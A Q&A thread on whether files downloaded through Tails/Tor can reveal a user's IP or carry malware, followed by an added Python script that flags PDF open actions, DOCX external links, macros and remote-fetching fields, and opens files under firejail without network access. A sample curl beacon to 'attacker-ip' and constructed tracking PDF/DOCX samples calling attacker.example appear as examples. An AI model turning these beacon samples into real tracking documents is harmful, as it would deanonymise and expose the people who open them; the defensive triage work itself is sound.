If I download a file (PDF, doc, image, video, etc.) with a Tails/Tor setup, how can I ensure the file doesn't "call home" or isn't embedded with malware (other than looking at the hash)? Will a simple malware scan work? And if I use Tails to open the files and disconnect from the network I'm using, can I still have my anonymity compromised?
Well, there are a lot of tools to analyze these files... too many to list. But you can put an application in a sandbox with `firejail`. You could open your PDF reader like `firejail xreader malware.pdf` and it would restrict the application with Linux namespaces – john doe Aug 13 '20 at 01:53
As said in one answer - it does not matter where you got this file from. Does this answer your question? [How to safely view a malicious PDF?](https://security.stackexchange.com/questions/18878/how-to-safely-view-a-malicious-pdf) – Steffen Ullrich Aug 13 '20 at 05:58
1 Answer
The fact that a file was downloaded with TOR doesn't really have much relevance to whether or not it's technically safe to open, except maybe that it might be "more likely" to be malware. If you're asking if opening the file will compromise your anonymity, then that depends on the filetype and your setup. Generally you can assume that unless you're using tails or a VM/Router that is proxying all traffic, anything that executes code as your local user is going to be able to "curl http://attacker-ip/3948291" and give you up that way. I wouldn't even be comfortable opening up a regular PDF/DOCX file because it'd be hard to be sure there wasn't some documented feature I'm unaware of where those file formats autoload external content, never mind a zero-day.
More generally, don't trust antivirus scans to be anything except a second line of defense. Consumer AV software (and honestly most enterprise IDS software) is generally only able to catch simple variations of already logged malware, or very obviously (to a computer) malicious combinations of sys or library calls. You also shouldn't expect to be safe unplugging the computer while you open it unless you're sure that whatever code you executed won't start up again later.
Those are really great points, thank you! Can a file instigate a malware attack just by downloading, or does it need to be opened first? If so, would downloading a file then rebooting a new instance of Tails with no network connection be enough to assure there isn't an attack? (assuming the computer never contained a hard drive and only a Tails USB), otherwise the malware must be stored in your RAM, right?? Is that even possible? – thatsmynickityname Aug 13 '20 at 02:45
TAILS is designed to be amnesic; you're given a clean slate when you reboot tails, so unless it persisted on some external storage that you then reintroduced, you should be OK. The problem with downloaded files isn't necessarily just code execution; if I can embed an image that is retrieved via hyperlink in that DOCX file, then I can just look on my server and see what IP connected to me, and now (if you didn't have TAILS or one of the other solutions I mentioned), I have your IP address. – Dean Valentine Aug 13 '20 at 02:51
Ok, that makes sense, thank you for clarifying! What about if the file is downloaded to a USB drive and then reopened from that drive when the network is offline (on a reboot of Tails)? Additionally, watering hole attacks use similar malware, correct? I read that the malware can be installed at a firmware level, is that true? If I fell victim to both a watering hole attack and an embedded malware attack by the same person, is Tails still going to keep my anonymity safe? – thatsmynickityname Aug 13 '20 at 03:12
You would do better to learn more about where the security boundaries exist in these systems and their guarantees than to try to rote memorize the status of each scenario you can think of. Historically that tactic doesn't work very well. – Dean Valentine Aug 13 '20 at 03:21
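The answer and the follow-up comments make two practical points: a document can "call home" through a documented feature (a PDF open action or URI, a DOCX image fetched from an external link) without any exploit, and a sandbox such as `firejail` should also cut the network. The script below is an added example, not code from the thread, from Tails or from firejail. It does the pre-open triage a practitioner would want: it looks for active-content tokens in a PDF and for external relationships, macro parts and remote-fetching fields in a DOCX, and it builds a firejail command line with `--net=none` added to the invocation from the comment above. The sample PDF and DOCX are constructed inline so the script runs offline; the `attacker.example` hostnames are made up. This is a heuristic check, so an empty result is not proof that a file is safe.

```python
"""Pre-open triage for PDF/DOCX files: does the document carry anything that
would make a viewer execute code or fetch a remote resource when opened?
Added example for the thread above, not part of Tails or firejail."""
import json
import re
import sys
import zipfile
from io import BytesIO
from pathlib import Path

# PDF name tokens that mean "do something" or "go somewhere" when the file is opened.
PDF_ACTIVE = re.compile(
    rb"/(OpenAction|AA|Launch|JavaScript|JS|URI|GoToR|SubmitForm|ImportData|EmbeddedFile|RichMedia)\b"
)
# Object streams can hide the dictionaries that carry the tokens above; if present,
# decompress first (e.g. qpdf --qdf --object-streams=disable in.pdf out.pdf) and rescan.
PDF_OBJSTM = re.compile(rb"/ObjStm\b")

# Word field codes that fetch remote content or start another program.
DOCX_FIELDS = re.compile(r"\b(INCLUDEPICTURE|INCLUDETEXT|HYPERLINK|DDEAUTO|DDE)\b")
# OOXML relationships with TargetMode="External" point outside the package (linked images,
# remote templates); the viewer resolves them and so reveals the client's IP address.
REL_EXTERNAL = re.compile(r'<Relationship\b[^>]*TargetMode="External"[^>]*>')
REL_TARGET = re.compile(r'Target="([^"]*)"')


def scan_pdf(data: bytes) -> dict:
    active = sorted({m.group(1).decode() for m in PDF_ACTIVE.finditer(data)})
    return {"active": active, "object_streams": bool(PDF_OBJSTM.search(data))}


def scan_docx(data: bytes) -> dict:
    external, fields, vba = [], set(), False
    with zipfile.ZipFile(BytesIO(data)) as z:
        for name in z.namelist():
            if name.lower().endswith("vbaproject.bin"):      # macro project part
                vba = True
            if name.endswith(".rels"):                       # relationship tables
                text = z.read(name).decode("utf-8", "replace")
                for rel in REL_EXTERNAL.finditer(text):
                    target = REL_TARGET.search(rel.group(0))
                    external.append((name, target.group(1) if target else "?"))
            if name.endswith(".xml"):                        # document body, headers, settings
                fields.update(DOCX_FIELDS.findall(z.read(name).decode("utf-8", "replace")))
    return {"external": external, "fields": sorted(fields), "vba": vba}


def scan(data: bytes) -> dict:
    """Dispatch on magic bytes rather than on the file extension."""
    if data.startswith(b"%PDF"):
        return {"type": "pdf", **scan_pdf(data)}
    if data.startswith(b"PK\x03\x04"):
        return {"type": "docx", **scan_docx(data)}
    return {"type": "unknown"}


def firejail_argv(viewer: str, path: str) -> list:
    """The comment's `firejail xreader malware.pdf`, plus --net=none so the sandbox has
    no network interfaces at all, and --noroot so the viewer cannot reach uid 0."""
    return ["firejail", "--net=none", "--noroot", viewer, str(path)]


# Constructed samples (not real malware): a PDF whose catalog opens a URI on load,
# a PDF with nothing active, and a DOCX with an external image plus an INCLUDEPICTURE field.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /S /URI /URI (http://attacker.example/beacon/3948291) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def build_sample_docx() -> bytes:
    buf = BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml",
                   '<w:document><w:body><w:p><w:r><w:instrText>'
                   ' INCLUDEPICTURE "http://attacker.example/track.png" \\d </w:instrText>'
                   '</w:r></w:p></w:body></w:document>')
        z.writestr("word/_rels/document.xml.rels",
                   '<Relationships><Relationship Id="rId1" '
                   'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
                   'Target="http://attacker.example/pixel.png" TargetMode="External"/></Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for arg in sys.argv[1:] or []:
        print(arg, json.dumps(scan(Path(arg).read_bytes())))
    print("demo pdf:", json.dumps(scan(SAMPLE_PDF)))
    print("demo docx:", json.dumps(scan(build_sample_docx())))
    print("open with:", " ".join(firejail_argv("xreader", "malware.pdf")))
```

Run it as `python3 triage.py download.pdf` before opening anything; a hit on `OpenAction`, `URI`, an external relationship or `INCLUDEPICTURE` is exactly the "documented feature that autoloads external content" the answer warns about. If `object_streams` is true, decompress with `qpdf --qdf --object-streams=disable` and rescan, since the tokens may be inside the compressed streams. Whatever the result, open the file with the `--net=none` command so a missed trigger has no route out.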